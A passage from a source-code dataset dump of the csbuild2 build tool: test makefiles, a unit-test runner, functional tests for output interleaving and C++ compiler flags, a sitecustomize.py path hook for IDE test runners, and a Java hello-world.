projectSettings, \"B\")\n\nclass WriteC(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\toutputFiles = {\".C\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"C\")\n\nclass WriteD(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\", \"E\"}\n\toutputFiles = {\".D\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"D\")\n\nclass WriteWindows(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\tsupportedPlatforms = {\"Windows\"}\n\toutputFiles = {\".Windows\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"Windows\")\n\nclass WriteLinux(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\tsupportedPlatforms = {\"Linux\"}\n\toutputFiles = {\".Linux\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"Linux\")\n\nclass WriteMacOs(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\tsupportedPlatforms = {\"Darwin\"}\n\toutputFiles = {\".Darwin\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"Darwin\")\n\ncsbuild.RegisterToolchain(\"A\", \"A\", WriteA)\ncsbuild.RegisterToolchain(\"B\", \"B\", WriteB)\ncsbuild.RegisterToolchain(\"C\", \"C\", WriteC)\ncsbuild.RegisterToolchain(\"D\", \"D\", WriteD)\ncsbuild.RegisterToolchain(\"Windows\", \"A\", WriteWindows)\ncsbuild.RegisterToolchain(\"Linux\", \"A\", WriteLinux)\ncsbuild.RegisterToolchain(\"Darwin\", \"A\", WriteMacOs)\n\ncsbuild.SetDefaultToolchain(\"A\")\ncsbuild.SetDefaultTarget(\"A\")\n\nwith csbuild.Target(\"A\"):\n\tpass\n\nwith csbuild.Target(\"B\"):\n\tpass\n\nwith csbuild.Project(\"AlwaysWorks\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetOutput(\"foo\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"ProjectWithLimitedArchitectures\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedArchitectures(\"A\", \"B\", \"C\")\n\tcsbuild.SetOutput(\"arch\", csbuild.ProjectType.Application)\n\nwith csbuild.Architecture(\"A\", \"B\", \"C\"):\n\twith csbuild.Project(\"ProjectWithLimitedArchitectures2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"arch2\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"ProjectWithExcludedTarget\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedTargets(\"A\")\n\tcsbuild.SetOutput(\"target\", csbuild.ProjectType.Application)\n\nwith csbuild.Target(\"A\"):\n\twith csbuild.Project(\"ProjectWithExcludedTarget2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"target2\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"ProjectWithSpecialTarget\", \".\", autoDiscoverSourceFiles=False):\n\twith csbuild.Target(\"special\"):\n\t\tcsbuild.SetOutput(\"special\", csbuild.ProjectType.Application)\n\tcsbuild.SetOutput(\"unspecial\", csbuild.ProjectType.Application)\n\nwith csbuild.Target(\"special\", addToCurrentScope=False):\n\twith csbuild.Project(\"ProjectWithSpecialTarget2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"special2\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"LimitedToolchains\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedToolchains(\"B\", \"C\", \"D\")\n\tcsbuild.SetOutput(\"toolchain\", csbuild.ProjectType.Application)\n\nwith csbuild.Toolchain(\"B\", \"C\", \"D\"):\n\twith csbuild.Project(\"LimitedToolchains2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"toolchain2\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"WindowsProject\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedPlatforms(\"Windows\")\n\tcsbuild.SetOutput(\"Windows\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"LinuxProject\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedPlatforms(\"Linux\")\n\tcsbuild.SetOutput(\"Linux\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"MacProject\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedPlatforms(\"Darwin\")\n\tcsbuild.SetOutput(\"Darwin\", csbuild.ProjectType.Application)\n\nwith csbuild.Platform(\"Windows\"):\n\twith csbuild.Project(\"WindowsProject2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"Windows2\", csbuild.ProjectType.Application)\n\nwith csbuild.Platform(\"Linux\"):\n\twith csbuild.Project(\"LinuxProject2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"Linux2\", csbuild.ProjectType.Application)\n\nwith csbuild.Platform(\"Darwin\"):\n\twith csbuild.Project(\"DarwinProject2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"Darwin2\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.7145286798477173, "alphanum_fraction": 0.7196307182312012, "avg_line_length": 34.79130554199219, "blob_id": "a297689f18fc31b4994afff531d7ca75bd23ce92", "content_id": "a3978ded8f75c4d3d584ae1734cab82ffb1193cb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4116, "license_type": "permissive", "max_line_length": 122, "num_lines": 115, "path": "/csbuild/_testing/run_unit_tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: run_unit_tests\n\t:synopsis: Import this file and call RunTests() to run csbuild's unit tests.\n\t\tEnsure cwd is one directory above the csbuild package. Do not execute directly, it will fail.\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport unittest\nimport fnmatch\nimport os\nimport imp\n\nfrom .. import log\nfrom .._utils import shared_globals, terminfo\nfrom .._testing import testcase\n\n\ndef RunTests(include, exclude):\n\t\"\"\"\n\tRun all unit tests.\n\tMust be executed with current working directory being a directory that contains the csbuild package.\n\n\t:param include: Filters to be the only things built\n\t:type include: list[str]\n\t:param exclude: Filters to not build\n\t:type exclude: list[str]\n\t:return: 0 if successful, 1 if not\n\t:rtype: int\n\t\"\"\"\n\tshared_globals.colorSupported = terminfo.TermInfo.SupportsColor()\n\tshared_globals.showCommands = True\n\ttests = unittest.defaultTestLoader.discover(\"csbuild\", \"*.py\", \".\")\n\tfor testdir in os.listdir(\"functional_tests\"):\n\t\tlog.Test(\"Loading functional tests from {}\", testdir)\n\t\tif os.path.isdir(os.path.join(\"functional_tests\", testdir)):\n\t\t\tmodulepath = os.path.join(\"functional_tests\", testdir, \"tests.py\")\n\t\t\tif os.access(modulepath, os.F_OK):\n\t\t\t\tlog.Test(\"Loading {}\", modulepath)\n\t\t\t\ttests.addTest(unittest.defaultTestLoader.loadTestsFromModule(imp.load_source(\"{}_TESTS\".format(testdir), modulepath)))\n\ttestRunner = testcase.TestRunner(xmlfile=\"result.xml\", stream=sys.stdout, verbosity=0)\n\n\t# Handle filtering:\n\t# 1) If include has any contents, remove any tests that don't match it\n\t# 2) Remove any tests that do match the exclude filter\n\t# 3) Finally, reorder the pylint test to be last in line because it is slow.\n\tpylinttest = None\n\tfor test in tests:\n\t\t# pylint: disable=protected-access\n\t\tfor test2 in test._tests:\n\t\t\tdelIndexes = []\n\t\t\t# pylint: disable=protected-access\n\t\t\ttry:\n\t\t\t\tfor idx, test3 in enumerate(test2._tests):\n\t\t\t\t\t# pylint: disable=protected-access\n\t\t\t\t\tbaseId = test3.id().rsplit('.', 2)[1]\n\t\t\t\t\tsimpleTestId = \"{}.{}\".format(baseId, test3._testMethodName)\n\t\t\t\t\tmatch = True\n\t\t\t\t\tif include:\n\t\t\t\t\t\tmatch = False\n\t\t\t\t\t\tfor inc in include:\n\t\t\t\t\t\t\tif fnmatch.fnmatch(simpleTestId, inc):\n\t\t\t\t\t\t\t\tmatch = True\n\t\t\t\t\t\tif not match:\n\t\t\t\t\t\t\tlog.Test(\"Excluding test {} due to no include match\", simpleTestId)\n\t\t\t\t\t\t\tdelIndexes.append(idx)\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\tfor exc in exclude:\n\t\t\t\t\t\tmatch = True\n\t\t\t\t\t\tif fnmatch.fnmatch(simpleTestId, exc):\n\t\t\t\t\t\t\tlog.Test(\"Excluding test {} due to exclude match\", simpleTestId)\n\t\t\t\t\t\t\tdelIndexes.append(idx)\n\t\t\t\t\t\t\tmatch = False\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif not match:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif baseId == \"TestPylint\":\n\t\t\t\t\t\tassert pylinttest is None\n\t\t\t\t\t\tpylinttest = test3\n\t\t\t\t\t\tdelIndexes.append(idx)\n\t\t\texcept AttributeError:\n\t\t\t\tcontinue\n\n\t\t\tfor idx in reversed(delIndexes):\n\t\t\t\t# pylint: disable=protected-access\n\t\t\t\tdel test2._tests[idx]\n\n\tif pylinttest is not None:\n\t\ttests.addTest(pylinttest)\n\n\tresult = testRunner.run(tests)\n\treturn 0 if result.wasSuccessful() else 1\n" }, { "alpha_fraction": 0.7454686760902405, "alphanum_fraction": 0.7501294612884521, "avg_line_length": 33.1769905090332, "blob_id": "0b9dfed771547d2dc0d371daa072b6ee6cf6906f", "content_id": "873273d285f6d701fbc70b4b2d089504415a3f39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3862, "license_type": "no_license", "max_line_length": 106, "num_lines": 113, "path": "/functional_tests/no_interleaved_output_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test that output from multiple commands run at once is not interleaved\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport threading\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild import commands, log\nfrom csbuild._utils import queue\n\n# Pay no attention to the unit test behind the curtain.\n# This test isn't really a functional test like the others.\n# It's a unit test of commands.Run()\n# However, given the way that needs to be tested, launching processes and checking output and return code,\n# the test fits the functional test pattern better than the unit test pattern, so it's being shoehorned\n# into a different place. Pay it no mind!\nclass NoInterleavedOutputTest(FunctionalTest):\n\t\"\"\"Ensure no interleaved output from commands\"\"\"\n\t# pylint: disable=invalid-name\n\tdef setUp(self): #pylint: disable=arguments-differ\n\t\tself.lastValue = -1\n\t\tself.numTallies = 0\n\t\tself.callbackQueue = queue.Queue()\n\n\t\t#overriding stdout rather than specifying a callback\n\t\t#because callbacks are called in realtime, stdout printing is queued\n\t\t#this test is testing the latter, that the queueing works properly\n\t\tself.oldLogStdout = log.Stdout\n\t\tlog.Stdout = self._stdoutOverride\n\n\t\tFunctionalTest.setUp(self, cleanAtEnd=False)\n\n\tdef tearDown(self):\n\t\tlog.Stdout = self.oldLogStdout\n\t\tFunctionalTest.tearDown(self)\n\n\tdef _stdoutOverride(self, msg):\n\t\tself.oldLogStdout(\" {}\".format(msg))\n\t\tvalue = int(msg)\n\t\tself.numTallies += 1\n\t\tself.assertTrue(value == self.lastValue + 1 or (value == 0 and self.lastValue == 9))\n\t\tself.lastValue = value\n\n\tdef RunMakeAndTally(self):\n\t\t\"\"\"\n\t\tRun the local makefile, tally the output to ensure it's not interleaved\n\t\t\"\"\"\n\n\t\tcmd = [sys.executable, \"print_some_stuff.py\"]\n\n\t\treturncode, _, _ = commands.Run(cmd)\n\t\tself.assertEqual(returncode, 0)\n\t\tself.callbackQueue.Put(commands.stopEvent)\n\n\tdef test(self):\n\t\t\"\"\"Ensure no interleaved output from commands\"\"\"\n\t\tcommands.queueOfLogQueues = queue.Queue()\n\t\toutputThread = threading.Thread(target=commands.PrintStaggeredRealTimeOutput)\n\t\toutputThread.start()\n\n\t\tthreads = [threading.Thread(target=self.RunMakeAndTally) for _ in range(10)]\n\n\t\tlog.SetCallbackQueue(self.callbackQueue)\n\n\t\tfor thread in threads:\n\t\t\tthread.start()\n\n\t\tstopped = 0\n\t\twhile True:\n\t\t\tcallback = self.callbackQueue.GetBlocking()\n\n\t\t\tif callback is commands.stopEvent:\n\t\t\t\tstopped += 1\n\t\t\t\tif stopped == len(threads):\n\t\t\t\t\tbreak\n\t\t\t\tcontinue\n\t\t\tcallback()\n\n\t\tfor thread in threads:\n\t\t\tthread.join()\n\n\t\tcommands.queueOfLogQueues.Put(commands.stopEvent)\n\t\toutputThread.join()\n\n\t\tlog.SetCallbackQueue(None)\n\t\tself.assertEqual(self.lastValue, 9)\n\t\tself.assertEqual(self.numTallies, len(threads) * 10)\n" }, { "alpha_fraction": 0.7104772329330444, "alphanum_fraction": 0.7147650718688965, "avg_line_length": 30.186046600341797, "blob_id": "418eaa820e928a583c3b68bd1231017adb4a88fe", "content_id": "71d18f379ed3409adc9b42c371e8552d10ae2595", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5364, "license_type": "no_license", "max_line_length": 108, "num_lines": 172, "path": "/sitecustomize.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2017 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: sitecustomize\n\t:synopsis: Hacky stuff for getting pycharm test runners to work\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport sys\n\n# Copied from csbuild._utils because we can't import that before we set environ, and we need this to do that\nif sys.version_info[0] >= 3:\n\tdef PlatformString(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in both python2 and python3.\n\t\t:return: str representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif isinstance(inputStr, str):\n\t\t\treturn inputStr\n\t\treturn inputStr.decode(\"UTF-8\")\nelse:\n\tdef PlatformString(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in both python2 and python3.\n\t\t:return: str representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif isinstance(inputStr, str):\n\t\t\treturn inputStr\n\t\treturn inputStr.encode(\"UTF-8\")\n\nedit_done = False\n\n\ndef PathHook(_):\n\t\"\"\"\n\tHacks around some stuff to make sure things are properly set up when running with jetbrains test runner\n\tinstead of run_unit_tests.py\n\t\"\"\"\n\tglobal edit_done\n\tif edit_done:\n\t\traise ImportError\n\ttry:\n\t\targv = sys.argv\n\texcept AttributeError:\n\t\tpass\n\telse:\n\t\tedit_done = True\n\t\tisTestRunner = False\n\t\tif argv[0].endswith(\"pydevd.py\"):\n\t\t\tfor arg in argv:\n\t\t\t\tif arg.endswith('_jb_unittest_runner.py'):\n\t\t\t\t\tisTestRunner = True\n\t\t\t\t\tbreak\n\t\telif argv[0].endswith('_jb_unittest_runner.py'):\n\t\t\tisTestRunner = True\n\n\t\tif isTestRunner:\n\t\t\timport signal\n\n\t\t\tdef _exitsig(sig, _):\n\t\t\t\tfrom csbuild import log\n\t\t\t\tif sig == signal.SIGINT:\n\t\t\t\t\tlog.Error(\"Keyboard interrupt received. Aborting test run.\")\n\t\t\t\telse:\n\t\t\t\t\tlog.Error(\"Received terminate signal. Aborting test run.\")\n\t\t\t\tos._exit(sig) # pylint: disable=protected-access\n\n\t\t\tsignal.signal(signal.SIGINT, _exitsig)\n\t\t\tsignal.signal(signal.SIGTERM, _exitsig)\n\n\t\t\tos.environ[PlatformString(\"CSBUILD_RUNNING_THROUGH_PYTHON_UNITTEST\")] = PlatformString(\"1\")\n\t\t\tos.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")] = PlatformString(\"1\")\n\t\t\tsys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))\n\t\t\tos.environ[PlatformString(\"PYTHONPATH\")] = os.pathsep.join(sys.path)\n\t\t\tos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n\traise ImportError # let the real import machinery do its work\n\n\nsys.path_hooks[:0] = [PathHook]\n\ndef EnableResourceWarningStackTraces():\n\t\"\"\"\n\tCalling this function patches the open() function to collect tracebacks, which will get printed\n\tif a ResourceWarning is thrown.\n\t\"\"\"\n\tfrom io import FileIO as _FileIO\n\timport _pyio\n\timport builtins # pylint: disable=import-error\n\timport linecache\n\timport traceback\n\timport tracemalloc # pylint: disable=import-error\n\timport warnings\n\n\tdef WarnUnclosed(obj, delta=1):\n\t\t\"\"\"Warns when unclosed files are detected\"\"\"\n\t\tdelta += 1\n\t\ttrace = tracemalloc.get_object_traceback(obj)\n\t\tif trace is None:\n\t\t\treturn\n\t\ttry:\n\t\t\twarnings.warn(\"unclosed %r\" % obj, ResourceWarning, delta + 1) # pylint: disable=undefined-variable\n\t\t\tprint(\"Allocation traceback (most recent first):\")\n\t\t\tfor frame in trace:\n\t\t\t\tprint(\" File %r, line %s\" % (frame.filename, frame.lineno))\n\t\t\t\tline = linecache.getline(frame.filename, frame.lineno)\n\t\t\t\tline = line.strip()\n\t\t\t\tif line:\n\t\t\t\t\tprint(\" %s\" % line)\n\n\t\t\tframe = sys._getframe(delta) # pylint: disable=protected-access\n\t\t\ttrace = traceback.format_stack(frame)\n\t\t\tprint(\"Destroy traceback (most recent last):\")\n\t\t\tfor line in trace:\n\t\t\t\tsys.stdout.write(line)\n\t\t\tsys.stdout.flush()\n\t\tfinally:\n\t\t\tobj.close()\n\n\n\tclass MyFileIO(_FileIO):\n\t\t\"\"\"Override for fileio that detects file leaks\"\"\"\n\t\tdef __init__(self, *args, **kw):\n\t\t\t_FileIO.__init__(self, *args, **kw)\n\t\t\ttrace = tracemalloc.get_object_traceback(self)\n\t\t\tif trace is None:\n\t\t\t\traise RuntimeError(\"tracemalloc is disabled\")\n\n\t\tdef __del__(self):\n\t\t\tif not self.closed:\n\t\t\t\tWarnUnclosed(self)\n\t\t\tif hasattr(_FileIO, '__del__'):\n\t\t\t\t_FileIO.__del__(self)\n\n\n\tdef PatchOpen():\n\t\t\"\"\"patch the open function to detect file leaks\"\"\"\n\t\t# Already patched\n\t\tif _pyio.FileIO is MyFileIO:\n\t\t\treturn\n\n\t\t# _io.open() uses an hardcoded reference to _io.FileIO\n\t\t# use _pyio.open() which lookup for FilIO in _pyio namespace\n\t\t_pyio.FileIO = MyFileIO\n\t\tbuiltins.open = _pyio.open\n\n\ttracemalloc.start(25)\n\tPatchOpen()\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 10.851851463317871, "blob_id": "f2b891a72236465984acbb1846f05ea4152bb965", "content_id": "7f7924d2f5307663b4a6de1b49ffd3e298179e78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 320, "license_type": "no_license", "max_line_length": 39, "num_lines": 27, "path": "/functional_tests/basic_java_test/hello_world/hello.java", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "package com.sleepingcat;\n\n// Hello world test program\nclass HelloWorld\n{\n\t// A nested test class\n\tpublic class OtherTest\n\t{\n\t\tpublic void test()\n\t\t{\n\t\t}\n\t}\n\n\t// Entry point\n\tpublic static void main(String[] args)\n\t{\n\t\tSystem.out.printf(\"Hello, world!\");\n\t}\n}\n\n// Some test class\nclass Test\n{\n\tpublic void test()\n\t{\n\t}\n}\n" }, { "alpha_fraction": 0.719809353351593, "alphanum_fraction": 0.722950279712677, "avg_line_length": 46.348716735839844, "blob_id": "f9a878f7f9b8ac6f00498ed7803ff4b37ab53539", "content_id": "0ef6011e8f64a3c5b1b14a895c684c80e471e1fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9233, "license_type": "no_license", "max_line_length": 138, "num_lines": 195, "path": "/functional_tests/cpp_features_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of C++ tools\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport unittest\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild._utils import PlatformBytes\n\nimport os\nimport platform\nimport re\nimport subprocess\n\nclass CppFeaturesTest(FunctionalTest):\n\t\"\"\"C++ features test\"\"\"\n\n\tExplicitDefineIsPresent = \"Explicit define is present\"\n\tImplicitDefineIsPresent = \"Implicit define is present\"\n\tNoExplicitDefine = \"No explicit define\"\n\tNoImplicitDefine = \"No implicit define\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.outputFile = \"out/hello_world.exe\"\n\t\telse:\n\t\t\tself.outputFile = \"out/hello_world\"\n\t\tFunctionalTest.setUp(self)\n\n\tdef testSetCcLanguageStandard(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=cc_standard\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=cc_standard\")\n\n\t\t# MSVC doesn't have a setting for the C language standard.\n\t\tif platform.system() != \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"-std=c11\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, world!\"))\n\n\tdef testSetCxxLanguageStandard(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=cxx_standard\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=cxx_standard\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/std:c\\+\\+14\\s\", re.M).search(out), None)\n\t\telse:\n\t\t\tself.assertIsNot(re.compile(R\"-std=c\\+\\+14\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, world!\"))\n\n\[email protected](platform.system() == \"Windows\", \"Incremental linking is only available on the MSVC linker\")\n\tdef testIncrementalLink(self):\n\t\t\"\"\"Test that incremental linking is enabled and generating an ILK file.\"\"\"\n\t\tself.cleanArgs = [\"--project=incremental_linking\", \"-o=msvc\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=incremental_linking\", \"-o=msvc\")\n\n\t\tilkFilePath = \"{}.ilk\".format(os.path.splitext(self.outputFile)[0])\n\n\t\tself.assertIsNot(re.compile(R\"/INCREMENTAL\\s\", re.M).search(out), None)\n\t\tself.assertIsNot(re.compile(R\"/ILK:\", re.M).search(out), None)\n\n\t\tself.assertFileExists(self.outputFile)\n\t\tself.assertFileExists(ilkFilePath)\n\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, world!\"))\n\n\tdef testDisableSymbolsDisableOptDynamicReleaseRuntime(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=nosymbols_noopt_dynamic_release\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", \"--target=nosymbols_noopt_dynamic_release\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIs(re.compile(R\"/Z7\\s|/Zi\\s|/ZI\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/Od\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/MD\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\telse:\n\t\t\tself.assertIs(re.compile(R\"-g\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-O0\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"{} - {}\".format(CppFeaturesTest.NoExplicitDefine, CppFeaturesTest.ImplicitDefineIsPresent)))\n\n\tdef testEmbeddedSymbolsSizeOptStaticReleaseRuntime(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=embeddedsymbols_sizeopt_static_release\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", 